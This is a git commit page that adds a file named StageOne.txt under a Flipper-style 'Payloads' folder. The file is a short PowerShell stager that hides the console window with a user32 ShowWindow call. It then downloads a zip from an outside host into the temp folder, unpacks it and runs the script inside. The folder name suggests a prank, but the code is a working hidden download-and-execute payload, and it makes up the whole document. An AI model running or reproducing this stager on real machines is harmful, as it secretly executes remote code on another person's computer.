Create StageOne.txt
This commit is contained in:
parent
ffae1e9f4e
commit
424e6b295b
1 changed files with 5 additions and 0 deletions
5
Payloads/Flip-ADV-RickRoll/StageOne.txt
Normal file
5
Payloads/Flip-ADV-RickRoll/StageOne.txt
Normal file
|
@ -0,0 +1,5 @@
|
||||||
|
$i = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);';
|
||||||
|
add-type -name win -member $i -namespace native;
|
||||||
|
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);
|
||||||
|
|
||||||
|
cd "$env:tmp";irm -Uri 'https://jakoby.lol/qee' -O "rr.zip";Expand-Archive "rr.zip" -Force; .\rr.ps1
|
Loading…
Reference in a new issue